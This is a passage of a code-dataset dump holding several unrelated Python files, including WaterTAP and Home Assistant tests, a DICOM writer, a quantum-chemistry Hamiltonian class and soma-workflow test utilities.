solver.solve(m, tee=False)\n assert_optimal_termination(results)\n\n m.fs.compressor.report()\n m.fs.evaporator.condenser.report()\n m.fs.evaporator.display()\n brine_blk = m.fs.evaporator.feed_side.properties_brine[0]\n # evaporator values\n assert brine_blk.pressure.value == pytest.approx(2.2738e4, rel=1e-3)\n assert m.fs.evaporator.lmtd.value == pytest.approx(12.30, rel=1e-3)\n assert m.fs.evaporator.feed_side.heat_transfer.value == pytest.approx(\n 1.231e6, rel=1e-3\n )\n\n # compressor values\n compressed_blk = m.fs.compressor.control_volume.properties_out[0]\n assert m.fs.compressor.control_volume.work[0].value == pytest.approx(\n 5.843e4, rel=1e-3\n )\n assert compressed_blk.pressure.value == pytest.approx(4.548e4, rel=1e-3)\n assert compressed_blk.temperature.value == pytest.approx(412.98, rel=1e-3)\n\n # condenser values\n condensed_blk = m.fs.evaporator.condenser.control_volume.properties_out[0]\n assert m.fs.evaporator.condenser.control_volume.heat[0].value == pytest.approx(\n -1.231e6, rel=1e-3\n )\n assert condensed_blk.temperature.value == pytest.approx(337.95, rel=1e-3)\n","sub_path":"watertap/unit_models/mvc/tests/test_mvc.py","file_name":"test_mvc.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"248881285","text":"#!/usr/bin/python3\n\nfrom requests_html import HTMLSession\nimport argparse\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\ndef get_score(project_list, wordlist):\n\tscore = 0\n\tfor project in project_list:\n\t\t# print(project)\n\t\tif('tags' in project):\n\t\t\tif('Écologie' in project['tags']):\n\t\t\t\tscore += 2\n\t\t\tif('Agrimentation' in project['tags']):\n\t\t\t\tscore += 2\n\t\tif('abstract' in project):\n\t\t\tfor word in wordlist:\n\t\t\t\tif(word in project['abstract']):\n\t\t\t\t\tscore+=1\n\t# print(score)\n\treturn(len(project_list),score)\n\n\n# returns a list of projects\ndef get_projects(transiscope, city_code):\n\tcity_projects = []\n\tfor elmt in transiscope['data']:\n\t\tif(\"postalCode\" in elmt['address']):\n\t\t\tif(elmt['address']['postalCode']==city_code):\n\t\t\t\tcity_projects.append(elmt)\n\treturn city_projects\n\ndef parse_json(transiscope):\n\t'''ORGA DU JSON : \n\t\t- licence\n\t\t- ontology\n\t\t- data[] :\n\t\t\t- id\n\t\t\t- name\n\t\t\t- geo{}\n\t\t\t- sourceKey\n\t\t\t- address{}\n\t\t\t\t- streetAddress\n\t\t\t\t- addressLocality\n\t\t\t\t- postalCode\n\t\t\t\t- addressCountry\n\t\t\t- createdAt\n\t\t\t- updatedAt\n\t\t\t- categories[]\n\t\t\t- addressString\n\t\t\t- abstract\n\t\t\t- website\n\t\t\t- tags[]\n\t'''\n\tfor elmt in transiscope['data']:\n\t\tif(\"postalCode\" in elmt['address'] and 'tags' in elmt):\n\t\t\tprint(str(elmt['address']['postalCode'])+' : '+str(elmt['tags']))\n\ndef init_trans(db_filename):\n\twith open(db_filename, 'r') as file_db:\n\t\ttransiscope = json.load(file_db)\n\treturn transiscope\n\ndef get_city(transiscope, code,wordlist):\n\tproject_list = get_projects(transiscope,code)\n\ttransiscore,score_ecolo = get_score(project_list,wordlist)\n\treturn [transiscore, score_ecolo]\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='Script pour récupérer infos du transiscope')\n\tparser.add_argument('--db',help='required JSON file for testing')\n\targs = parser.parse_args()\n\ttransiscope = init_trans(args.db)\n\tparse_json(transiscope)\t\n\tproject_list = get_projects(transiscope,'95400')\n\twordlist = ['écologie','nature','transition','bio','biodiversité']\n\tget_score(project_list, wordlist)\n","sub_path":"transiscope.py","file_name":"transiscope.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"160007514","text":"from django.urls import path\nfrom . import views\n\napp_name = 'collate'\nurlpatterns = [\n path('', views.ImportFileView.as_view(), name='import'),\n path('create/', views.CreateEntitiesView.as_view(), name='create'),\n path('form/', views.index, name='index'),\n path('merge/', views.MergeValidationsView.as_view(), name='merge'),\n path('clone/', views.CloneValidationsView.as_view(), name='clone'),\n path('gta-short-url/', views.ParseShortUrlView.as_view(), name='gta-short-url'),\n path('test-run-check/', views.CheckTestRunExist.as_view(), name='test-run-check'),\n\n]\n","sub_path":"backend/reporting/api/collate/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"190810838","text":"import os\nimport re\nimport odil\n\nclass FlatDICOMWriter(object):\n def __init__(self, root, iso_9660, transfer_syntax):\n self.root = root\n self.iso_9660 = iso_9660\n self.transfer_syntax = transfer_syntax\n self.files = []\n\n def __call__(self, data_set):\n if not os.path.isdir(self.root):\n os.makedirs(self.root)\n\n if self.iso_9660:\n filename = \"{:08d}.dcm\".format(1+len(os.listdir(self.root)))\n else:\n filename = data_set.as_string(\"SOPInstanceUID\")[0].decode()\n\n destination = os.path.join(self.root, filename)\n with odil.open(destination, \"wb\") as fd:\n odil.Writer.write_file(\n data_set, fd, odil.DataSet(), self.transfer_syntax)\n self.files.append(destination)\n","sub_path":"src/python/dicomifier/bruker_to_dicom/flat_dicom_writer.py","file_name":"flat_dicom_writer.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"534351401","text":"\"\"\"The tests for generic camera component.\"\"\"\nimport asyncio\n\nfrom aiohttp.client_exceptions import ClientResponseError\n\nfrom homeassistant.const import HTTP_INTERNAL_SERVER_ERROR\nfrom homeassistant.setup import async_setup_component\nfrom homeassistant.util import dt as dt_util\n\n# An infinitesimally small time-delta.\nEPSILON_DELTA = 0.0000000001\n\n\ndef radar_map_url(dim: int = 512, country_code: str = \"NL\") -> str:\n \"\"\"Build map url, defaulting to 512 wide (as in component).\"\"\"\n return f\"https://api.buienradar.nl/image/1.0/RadarMap{country_code}?w={dim}&h={dim}\"\n\n\nasync def test_fetching_url_and_caching(aioclient_mock, hass, hass_client):\n \"\"\"Test that it fetches the given url.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\")\n\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert resp.status == 200\n assert aioclient_mock.call_count == 1\n body = await resp.text()\n assert body == \"hello world\"\n\n # default delta is 600s -> should be the same when calling immediately\n # afterwards.\n\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 1\n\n\nasync def test_expire_delta(aioclient_mock, hass, hass_client):\n \"\"\"Test that the cache expires after delta.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\")\n\n await async_setup_component(\n hass,\n \"camera\",\n {\n \"camera\": {\n \"name\": \"config_test\",\n \"platform\": \"buienradar\",\n \"delta\": EPSILON_DELTA,\n }\n },\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert resp.status == 200\n assert aioclient_mock.call_count == 1\n body = await resp.text()\n assert body == \"hello world\"\n\n await asyncio.sleep(EPSILON_DELTA)\n # tiny delta has passed -> should immediately call again\n resp = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 2\n\n\nasync def test_only_one_fetch_at_a_time(aioclient_mock, hass, hass_client):\n \"\"\"Test that it fetches with only one request at the same time.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\")\n\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp_1 = client.get(\"/api/camera_proxy/camera.config_test\")\n resp_2 = client.get(\"/api/camera_proxy/camera.config_test\")\n\n resp = await resp_1\n resp_2 = await resp_2\n\n assert (await resp.text()) == (await resp_2.text())\n\n assert aioclient_mock.call_count == 1\n\n\nasync def test_dimension(aioclient_mock, hass, hass_client):\n \"\"\"Test that it actually adheres to the dimension.\"\"\"\n aioclient_mock.get(radar_map_url(700), text=\"hello world\")\n\n await async_setup_component(\n hass,\n \"camera\",\n {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\", \"dimension\": 700}},\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert aioclient_mock.call_count == 1\n\n\nasync def test_belgium_country(aioclient_mock, hass, hass_client):\n \"\"\"Test that it actually adheres to another country like Belgium.\"\"\"\n aioclient_mock.get(radar_map_url(country_code=\"BE\"), text=\"hello world\")\n\n await async_setup_component(\n hass,\n \"camera\",\n {\n \"camera\": {\n \"name\": \"config_test\",\n \"platform\": \"buienradar\",\n \"country_code\": \"BE\",\n }\n },\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert aioclient_mock.call_count == 1\n\n\nasync def test_failure_response_not_cached(aioclient_mock, hass, hass_client):\n \"\"\"Test that it does not cache a failure response.\"\"\"\n aioclient_mock.get(radar_map_url(), text=\"hello world\", status=401)\n\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n await client.get(\"/api/camera_proxy/camera.config_test\")\n await client.get(\"/api/camera_proxy/camera.config_test\")\n\n assert aioclient_mock.call_count == 2\n\n\nasync def test_last_modified_updates(aioclient_mock, hass, hass_client):\n \"\"\"Test that it does respect HTTP not modified.\"\"\"\n # Build Last-Modified header value\n now = dt_util.utcnow()\n last_modified = now.strftime(\"%a, %d %m %Y %H:%M:%S GMT\")\n\n aioclient_mock.get(\n radar_map_url(),\n text=\"hello world\",\n status=200,\n headers={\"Last-Modified\": last_modified},\n )\n\n await async_setup_component(\n hass,\n \"camera\",\n {\n \"camera\": {\n \"name\": \"config_test\",\n \"platform\": \"buienradar\",\n \"delta\": EPSILON_DELTA,\n }\n },\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n resp_1 = await client.get(\"/api/camera_proxy/camera.config_test\")\n # It is not possible to check if header was sent.\n assert aioclient_mock.call_count == 1\n\n await asyncio.sleep(EPSILON_DELTA)\n\n # Content has expired, change response to a 304 NOT MODIFIED, which has no\n # text, i.e. old value should be kept\n aioclient_mock.clear_requests()\n # mock call count is now reset as well:\n assert aioclient_mock.call_count == 0\n\n aioclient_mock.get(radar_map_url(), text=None, status=304)\n\n resp_2 = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 1\n\n assert (await resp_1.read()) == (await resp_2.read())\n\n\nasync def test_retries_after_error(aioclient_mock, hass, hass_client):\n \"\"\"Test that it does retry after an error instead of caching.\"\"\"\n await async_setup_component(\n hass, \"camera\", {\"camera\": {\"name\": \"config_test\", \"platform\": \"buienradar\"}}\n )\n await hass.async_block_till_done()\n\n client = await hass_client()\n\n aioclient_mock.get(radar_map_url(), text=None, status=HTTP_INTERNAL_SERVER_ERROR)\n\n # A 404 should not return data and throw:\n try:\n await client.get(\"/api/camera_proxy/camera.config_test\")\n except ClientResponseError:\n pass\n\n assert aioclient_mock.call_count == 1\n\n # Change the response to a 200\n aioclient_mock.clear_requests()\n aioclient_mock.get(radar_map_url(), text=\"DEADBEEF\")\n\n assert aioclient_mock.call_count == 0\n\n # http error should not be cached, immediate retry.\n resp_2 = await client.get(\"/api/camera_proxy/camera.config_test\")\n assert aioclient_mock.call_count == 1\n\n # Binary text can not be added as body to `aioclient_mock.get(text=...)`,\n # while `resp.read()` returns bytes, encode the value.\n assert (await resp_2.read()) == b\"DEADBEEF\"\n","sub_path":"tests/components/buienradar/test_camera.py","file_name":"test_camera.py","file_ext":"py","file_size_in_byte":7304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"469275935","text":"# coding: utf-8\n\nimport os\nimport code\nimport lxml.html\n \ndef process():\n\tfor html in os.listdir('sources'):\n\t\twith open('pt-BR/%s' % html) as file:\n\t\t\tparsed = lxml.html.fromstring(file.read())\n\t\tps = parsed.cssselect('body p')\n\t\ttext = []\n\t\tfor p in ps:\n\t\t\tlines = [l.strip() for l in p.text_content().split('\\n')]\n\t\t\ttext.append(' '.join(lines))\n\t\t\ttext.append('')\n\t\tfname = os.path.splitext(html)[0]\n\t\twith open('en/%s.txt' % fname, 'w') as file:\n\t\t\tfile.write('\\n'.join(text).encode('utf-8'))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"60651763","text":"import collections\nimport jieba\nfrom pathlib import Path\n\nfrom utils import yaml_utils\n\nvocabulary_size = 5000\ndataset_name = 'wiki_corpus' # wiki_corpus\noutput_dir = Path('../dataset').absolute()\n\n\ndef read_data(path):\n data_path = Path(path)\n raw_word_list = list()\n total = 1\n with data_path.open(mode='r', encoding='UTF-8') as f:\n line = f.readline()\n while line:\n line = f.readline()\n total += 1\n print('\\r 当前第{}行'.format(total), end='')\n with data_path.open(mode='r', encoding='UTF-8') as f:\n line = f.readline()\n i = 1\n while line:\n while '\\n' in line:\n line = line.replace('\\n', '')\n while ' ' in line:\n line = line.replace(' ', '')\n if len(line) > 0:\n raw_words = list(jieba.cut(line, cut_all=False))\n raw_word_list.extend(raw_words)\n print('\\r >>当前读取到{}/{}行'.format(i, total), end='')\n line = f.readline()\n i += 1\n return raw_word_list\n\n\n# Step 2: Build the dictionary and replace rare words with UNK token.\ndef build_dataset(words):\n print('统计字符出现的数量')\n count = [('UNK', -1)]\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n print('创建词典')\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n print('根据词典转化原数据成序列')\n data = list()\n unk_count = 0\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n index = 0 # dictionary['UNK']\n unk_count += 1\n data.append(index)\n count[0] = ('UNK', unk_count)\n print('制作反向查询词典')\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n output_path = output_dir / dataset_name\n print('导出文件')\n yaml_utils.write(output_path / 'data.yaml', data)\n yaml_utils.write(output_path / 'reverse_dictionary.yaml', reverse_dictionary)\n with (output_path / 'dictionary.tsv').open(mode='w', encoding='UTF-8') as file:\n for i in range(vocabulary_size):\n file.write(reverse_dictionary[i] + '\\n')\n info_dict = {'vocabulary_size': vocabulary_size, 'data': str(output_path / 'data.yaml'),\n 'dictionary': str(output_path / 'dictionary.tsv'),\n 'reverse_dictionary': str(output_path / 'reverse_dictionary.yaml')}\n yaml_utils.write(output_path / 'info.yaml', info_dict)\n print('导出完成')\n\n\nif __name__ == '__main__':\n words = read_data('../data/{}.txt'.format(dataset_name))\n build_dataset(words)\n","sub_path":"scripts/build_ch_dataset.py","file_name":"build_ch_dataset.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"99269194","text":"from PIL import Image ,ImageDraw,ImageFont\r\n\r\n\r\nim = Image.open('test.png')\r\ndraw = ImageDraw.Draw(im)\r\nprint (im.format,im.size,im.mode)\r\nfont = ImageFont.truetype(\"consola.ttf\", 40, encoding=\"unic\")#设置字体\r\ndraw.text((700, 50), u'99', 'red', font)\r\n \r\nim.show()\r\n\r\n","sub_path":"0000.py","file_name":"0000.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"556768177","text":"import numpy as np\nimport copy as cp\n\nclass Hamiltonian:\n# {{{\n def __init__(self):\n self.t = np.array([]) # 1e electrons (with frozen core contributions\n self.V = np.array([]) # 2e electrons\n self.e_nuc = 0\n self.e_core = 0\n self.C = np.array([]) # MO coeffs defining the basis for H \n self.S = np.array([]) # Overlap integrals defining the basis for H \n self.C_core = np.array([]) # MO coeffs defining the frozen core \n\n def transform_orbs(self,U):\n \"\"\"\n Rotate orbitals by a unitary transformation matrix, U\n U(old_basis, new_basis)\n \"\"\"\n assert(len(U.shape)==2)\n self.C = self.C.dot(U)\n self.t = U.T.dot(self.t).dot(U)\n \n '''\n self.V = np.einsum(\"pqrs,pt,qu,rv,sw->tuvw\",self.V,U,U,U,U)\n '''\n self.V = np.tensordot(self.V, U, axes=(0,0))\n self.V = np.tensordot(self.V, U, axes=(0,0))\n self.V = np.tensordot(self.V, U, axes=(0,0))\n self.V = np.tensordot(self.V, U, axes=(0,0))\n\n return\n\n def transform_to_new_mos(self,C_new):\n \"\"\"\n Transform the hamiltonian to the new mo basis, C_new\n \"\"\"\n assert(C_new.shape[0] <= self.C.shape[0])\n assert(C_new.shape[1] <= self.C.shape[1])\n \n # Get transformation matrix\n U = self.C.T.dot(self.S).dot(C_new)\n self.transform_orbs(U)\n \n return U\n\n def extract_Hamiltonian(self,orb_subset):\n \"\"\"\n Project Hamiltonian onto a given orbital subset and return Hamiltonian object\n\n i.e., \n orb_subset = [4,6,8,9]\n \"\"\"\n assert(len(orb_subset) <= self.t.shape[0])\n \n H = Hamiltonian()\n H.e_nuc = cp.deepcopy(self.e_nuc)\n H.e_core = cp.deepcopy(self.e_core)\n H.S = cp.deepcopy(self.S)\n H.C_core = cp.deepcopy(self.C_core)\n \n H.C = self.C[:,orb_subset]\n H.t = self.t[orb_subset,:][:,orb_subset]\n #H.V = self.V[:,:,:,orb_subset][:,:,orb_subset,:][:,orb_subset,:,:][orb_subset,:,:,:]\n H.V = self.V[orb_subset,:,:,:][:,orb_subset,:,:][:,:,orb_subset,:][:,:,:,orb_subset]\n \n return H\n\n def reorder_orbitals(self,orb_order):\n \"\"\"\n Reorder Hamiltonian \n \"\"\"\n assert(len(orb_order) <= self.t.shape[0])\n \n self.C = self.C[:,orb_order]\n self.t = self.t[orb_order,:][:,orb_order]\n #self.V = self.V[:,:,:,orb_order][:,:,orb_order,:][:,orb_order,:,:][orb_order,:,:,:]\n self.V = self.V[orb_order,:,:,:][:,orb_order,:,:][:,:,orb_order,:][:,:,:,orb_order]\n return \n\n def get_C(self):\n if(self.C.shape[0] != self.C_core.shape[0]):\n print(\"ERROR: self.C.shape[0] != self.C_core.shape[0])\")\n exit(-1)\n return np.hstack((self.C_core,self.C))\n \n def nbf(self):\n return self.C.shape[0]\n def nmo(self):\n return self.C.shape[1]\n \n def get_eri_1122(self,ob1,ob2):\n \"\"\"\n Return 2e integrals corresponding to (pq|rs)\n where pq in ss1\n and rs in ss2\n \"\"\"\n ss1 = ob1.orbs\n ss2 = ob2.orbs\n return self.V[ss1,:,:,:][:,ss1,:,:][:,:,ss2,:][:,:,:,ss2]\n\n def get_eri(self,ob1,ob2,ob3,ob4):\n \"\"\"\n Return 2e integrals corresponding to (pq|rs)\n where pq in ss1\n and rs in ss2\n \"\"\"\n ss1 = ob1.orbs\n ss2 = ob2.orbs\n ss3 = ob3.orbs\n ss4 = ob4.orbs\n return self.V[ss1,:,:,:][:,ss2,:,:][:,:,ss3,:][:,:,:,ss4]\n\n def compute_determinant_energy(self,str_a,str_b):\n \"\"\"\n For a given alpha and beta string, compute and return the energy\n \"\"\"\n E = self.e_nuc + self.e_core\n \n for i in str_a:\n E += self.t[i,i]\n for j in str_a:\n if i = Gamma^{IJ}_pq where both \n # p and q are alpha\n # self.tdms[\"cca_aab\"] = = Gamma_cca_aab^{IJ}_pqr where both \n # p and q are alpha and r is\n # beta - only non-zero if I\n # and J have different numbers\n # of alpha beta electrons\n\n # NYI:\n\n #\n # still to convert to ab initio ....\n self.Spi = {} # matrix_rep of i'th S^+ in local basis\n self.Smi = {} # matrix_rep of i'th S^- in local basis\n self.Szi = {} # matrix_rep of i'th S^z in local basis\n\n # in tucker basis\n self.Ham = np.array([]) # Hamiltonian on block sublattice\n self.S2 = np.array([]) # S2 on block sublattice\n self.Sz = np.array([]) # Sz on block sublattice\n\n # in configuration basis\n self.full_H = np.array([]) # Hamiltonian on block sublattice\n self.full_S2 = np.array([]) # S2 on block sublattice\n self.full_Sz = np.array([]) # Sz on block sublattice\n\n self.diis_vecs = np.array([]) \n \n def init(self,_index,_orbs,_ss):\n \"\"\"\n _index = index of block\n _sites = list of lattice sites contained in block\n _ss = list of dimensions of vectors per subspace, -1 indicates all remaining states\n \"\"\"\n self.index = _index\n self.orbs = _orbs\n for si in range(0,self.n_orbs()):\n self.full_dim *= 4\n \n vec_count = 0\n for ss in _ss:\n # if we have asked for orthog compliment\n if ss == -1:\n self.ss_dims.append(self.full_dim - vec_count)\n vec_count = self.full_dim\n else:\n self.ss_dims.append(ss)\n vec_count += ss\n if (self.full_dim-vec_count) < 0:\n print(\"Problem setting block dimensions\", self)\n exit(-1)\n self.ss_dims.append(self.full_dim-vec_count)\n return \n \n def n_orbs(self):\n return len(self.orbs)\n\n def fill_H(self,Hfull):\n self.H = Hfull.extract_Hamiltonian(self.orbs)\n \n def __str__(self):\n out = \" Block %-4i:\" %(self.index)\n for si in range(0,self.n_orbs()):\n if si < self.n_orbs()-1:\n out += \"%5i,\" %(self.orbs[si])\n else:\n out += \"%5i\" %(self.orbs[si])\n out += \" : \" + str(self.ss_dims)\n return out\n\n# }}}\n\n\nclass Molecule:\n# {{{\n def __init__(self):\n self.na = 0\n self.nb = 0\n self.n_mo = 0\n self.n_bf = 0\n self.ftc = [] # function_to_center\n self.n_atom = 0\n\n def function_to_center(self,i):\n \"\"\"\n The atomic center for the i'th function\n \"\"\"\n assert(len(self.ftc) == self.n_bf)\n return self.ftc[i]\n\n# }}}\n\n\n","sub_path":"save/lib/Hamiltonian.py","file_name":"Hamiltonian.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"298374577","text":"from __future__ import with_statement, print_function\n'''\n@author: laure.hugo@cea.fr\n@author: Soizic Laguitton\n@organization: U{IFR 49}\n@license: U{CeCILL version 2}\n'''\n\nimport unittest\nimport sys\nimport os\nimport shutil\nimport tempfile\nimport socket\n\nfrom soma_workflow.client import WorkflowController\nfrom soma_workflow.configuration import Configuration, LIGHT_MODE\nfrom soma_workflow.test.utils import get_user_id\nfrom soma_workflow.test.utils import suppress_stdout\n\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesLocal\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesShared\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesSharedTransfer\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesTransfer\n\n\nclass WorkflowTest(unittest.TestCase):\n\n LOCAL_PATH = \"local path\"\n FILE_TRANSFER = \"file transfer\"\n SHARED_RESOURCE_PATH = \"shared resource path\"\n SHARED_TRANSFER = \"file transfer and shared resource path\"\n\n wf_ctrl = None\n path_management = None\n wf_examples = None\n wf_id = None\n\n @classmethod\n def setup_wf_controller(cls, workflow_controller):\n cls.wf_ctrl = workflow_controller\n\n @classmethod\n def setup_path_management(cls, path_management):\n '''\n * path_management: LOCAL_PATH, FILE_TRANSFER or SHARED_RESOURCE_PATH\n '''\n cls.path_management = path_management\n\n def setUp(self):\n if self.path_management == self.LOCAL_PATH:\n workflow_examples = WorkflowExamplesLocal()\n elif self.path_management == self.FILE_TRANSFER:\n workflow_examples = WorkflowExamplesTransfer()\n elif self.path_management == self.SHARED_RESOURCE_PATH:\n workflow_examples = WorkflowExamplesShared()\n elif self.path_management == self.SHARED_TRANSFER:\n workflow_examples = WorkflowExamplesSharedTransfer()\n self.wf_examples = workflow_examples\n\n def tearDown(self):\n if self.wf_id:\n self.__class__.wf_ctrl.delete_workflow(self.wf_id)\n if os.path.isdir(self.wf_examples.output_dir):\n shutil.rmtree(self.wf_examples.output_dir)\n\n @classmethod\n def run_test(cls, debug=False, interactive=False, **kwargs):\n sys.stdout.write(\"********* soma-workflow tests: WORKFLOW *********\\n\")\n\n config_file_path = Configuration.search_config_path()\n # sys.stdout.write(\"Configuration file: \" + config_file_path + \"\\n\")\n resource_ids = Configuration.get_configured_resources(config_file_path)\n\n for resource_id in resource_ids:\n sys.stdout.write(\"============ Resource : \" + resource_id +\n \" =================== \\n\")\n config = Configuration.load_from_file(resource_id,\n config_file_path)\n if not interactive and config.get_mode() != LIGHT_MODE:\n sys.stdout.write('Resource %s is not tested in '\n 'non-interactive mode\\n' % resource_id)\n continue # skip login/password ask\n if interactive:\n sys.stdout.write(\"Do you want to test the resource \"\n \"%s (Y/n) ? \" % resource_id)\n sys.stdout.flush()\n test_resource = sys.stdin.readline()\n if test_resource.strip() in ['no', 'n', 'N', 'No', 'NO']:\n # Skip the resource\n sys.stdout.write('Resource %s is not tested \\n'\n % resource_id)\n sys.stdout.flush()\n continue\n (login, password) = get_user_id(resource_id, config)\n\n if config.get_mode() == LIGHT_MODE:\n # use a temporary sqlite database in soma-workflow to avoid\n # concurrent access problems\n tmpdb = tempfile.mkstemp('.db', prefix='swf_')\n os.close(tmpdb[0])\n os.unlink(tmpdb[1])\n # and so on for transfers / stdio files directory\n tmptrans = tempfile.mkdtemp(prefix='swf_')\n config._database_file = tmpdb[1]\n config._transfered_file_dir = tmptrans\n\n try:\n\n with suppress_stdout(debug):\n wf_controller = WorkflowController(resource_id,\n login,\n password,\n config=config)\n cls.setup_wf_controller(wf_controller)\n\n allowed_config = cls.allowed_config[:]\n for configuration in cls.allowed_config:\n if config.get_mode() != configuration[0]:\n allowed_config.remove(configuration)\n if len(allowed_config) == 0:\n sys.stdout.write(\n \"No tests available for the resource %s \\n\"\n % resource_id)\n\n for configuration in allowed_config:\n (mode, file_system) = configuration\n sys.stdout.write(\n \"\\n---------------------------------------\\n\")\n sys.stdout.write(\"Mode : \" + mode + '\\n')\n sys.stdout.write(\"File system : \" + file_system + '\\n')\n cls.setup_path_management(file_system)\n\n if file_system in (cls.SHARED_RESOURCE_PATH,\n cls.SHARED_TRANSFER) \\\n and not config.get_path_translation():\n sys.stdout.write(\n \"Paths translation unavailable - not testing \"\n \"this case\\n\")\n sys.stdout.flush()\n continue\n\n suite_list = []\n list_tests = []\n for test in dir(cls):\n prefix = \"test_\"\n if len(test) < len(prefix):\n continue\n if test[0: len(prefix)] == prefix:\n list_tests.append(test)\n\n suite_list.append(unittest.TestSuite(map(cls,\n list_tests)))\n alltests = unittest.TestSuite(suite_list)\n with suppress_stdout(debug):\n res = unittest.TextTestRunner(verbosity=2).run(\n alltests)\n sys.stdout.flush()\n\n if len(res.errors) != 0 or len(res.failures) != 0:\n raise RuntimeError(\"tests failed.\")\n\n finally:\n if config.get_mode() == LIGHT_MODE:\n if not kwargs.get('keep_temporary', False):\n os.unlink(config._database_file)\n shutil.rmtree(config._transfered_file_dir)\n else:\n print('temporary files kept:')\n print('databse file:', config._database_file)\n print('transfers:', config._transfered_file_dir)\n\n @staticmethod\n def print_help(argv):\n print(argv[0],\n '[-h|--help] [--interactive] [--keep-temporary] [--debug]')\n\n @staticmethod\n def parse_args(argv):\n kwargs = {}\n if len(argv) > 1:\n if '-h' in argv[1:] or '--help' in argv[1:]:\n WorkflowTest.print_help(argv)\n sys.exit(0)\n if '--interactive' in argv[1:]:\n kwargs['interactive'] = True\n if '--keep-temporary' in argv[1:]:\n kwargs['keep_temporary'] = True\n if '--debug' in argv[1:]:\n kwargs['debug'] = True\n else:\n kwargs['debug'] = False\n return kwargs\n\n def print_job_io_info(self, job_id, msg=None, file=sys.stderr):\n # this debug info should be removed when we find\n # out why tests randomly fail from time to time.\n (jobs_info, transfers_info, workflow_status, workflow_queue,\n tmp_files) = self.wf_ctrl.workflow_elements_status(self.wf_id)\n job_list = self.wf_ctrl.jobs([job_id])\n job_name, job_command, job_submission_date = job_list[job_id]\n\n print('\\n** failure in %s job stdout/stderr **'\n % self.__class__.__name__, file=file)\n print('job id:', job_id, ', job name:', job_name, file=file)\n if msg:\n print('++ error message: ++', file=file)\n print(msg, file=file)\n print('++ (message end) ++', file=file)\n eng_stdout, eng_stderr = \\\n self.wf_ctrl._engine_proxy.stdouterr_file_path(job_id)\n print('job engine stdout:', eng_stdout, ', stderr:', eng_stderr,\n file=file)\n print('++ stdout: ++', file=file)\n print(open(eng_stdout).read(), file=file)\n print('++ (stdout end) ++', file=file)\n print('++ stderr: ++', file=file)\n print(open(eng_stderr).read(), file=file)\n print('++ (stderr end) ++', file=file)\n jobs_files = [\n (ji[0],\n self.wf_ctrl._engine_proxy.stdouterr_file_path(ji[0]))\n for ji in jobs_info]\n print('engine jobs files:', jobs_files, file=file)\n print('jobs list:', job_list, file=file)\n print('tmp_files:', tmp_files, file=file)\n print('** (job failure end) **', file=file)\n\n def assertTrue(self, condition, msg=None):\n if not bool(condition) and hasattr(self, 'tested_job'):\n self.print_job_io_info(self.tested_job, msg)\n return super(WorkflowTest, self).assertTrue(condition, msg)\n\n def assertFalse(self, condition, msg=None):\n if bool(condition) and hasattr(self, 'tested_job'):\n self.print_job_io_info(self.tested_job, msg)\n return super(WorkflowTest, self).assertFalse(condition, msg)\n\n def assertEqual(self, first, second, msg=None):\n if first != second and hasattr(self, 'tested_job'):\n self.print_job_io_info(self.tested_job, msg)\n return super(WorkflowTest, self).assertEqual(first, second, msg)\n\n def assertNonEqual(self, first, second, msg=None):\n if first == second and hasattr(self, 'tested_job'):\n self.print_job_io_info(self.tested_job, msg)\n return super(WorkflowTest, self).assertNonEqual(first, second, 